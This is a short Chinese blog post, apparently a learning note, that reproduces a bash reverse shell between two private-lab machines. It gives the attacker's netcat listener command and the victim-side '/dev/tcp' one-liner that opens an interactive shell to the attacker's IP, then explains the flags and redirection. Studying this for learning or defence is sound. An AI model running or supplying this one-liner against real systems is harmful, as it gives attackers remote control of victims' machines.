bash反弹shell

part1:不求甚解的本地复现

  攻击端Debian 10.x:  192.168.208.134

 

  受害端Ubuntu : 192.168.208.135

 

 

攻击端打开(监听)某端口:  

  键入命令:【nc -lvp 8080】

 

受害端执行反弹shell: 

 

  键入命令:【bash -i >& /dev/tcp/192.168.208.134/8080 0>&1】

 

效果:

 

       可以在攻击机上操作受害机的终端。

 

 

part2:尝试理解原理

    (1) nc -lvp 8080

       -l  设置netcat处于监听状态等待连接。

       -v  显示错误提示信息(非必须)

       -p 设置本地监听的端口号

    (2) bash -i >& dev/tcp/192.168.208.134/8080 0>&1

        -i  创建一个交互式的shell.

          0,stdin,标准输入(一般是键盘)
          1,stdout,标准输出(一般是显示屏,准确的说是用户终端控制台)
          2,stderr,标准错误(出错信息输出)

        > 输出重定向;指定具体的输出目标以替换默认的标准输出。

            eg:

 

         >&:将联合符号前面的内容与后面相结合然后一起重定向给后者。

         dev/tcp/192.168.208.134/8080(dev/tcp/ip/port):linux里一切皆文件;这个东西也看做文件(但不能访问),其作用是让本机与目标主机通过指定端口建立tcp连接。

 


整体解读的话,就是:

  bash产生了一个交互环境与本地主机主动发起与目标主机8080端口建立的连接(即TCP 8080 会话连接)相结合,并重定向给tcp 8080会话连接;(这个具体咋回事估计得等再学点东西才能理解)

       用户键盘输入与用户标准输出相结合,并重定向给一个标准的输出;(这就是效果图中ls出现两次的原因;第二次是因为标准输入也被重定向给了标准输出,输出出来了)

  即得到一个bash 反弹环境。

posted @ 2021-09-19 17:29  hiddener  阅读(2186)  评论(0编辑  收藏  举报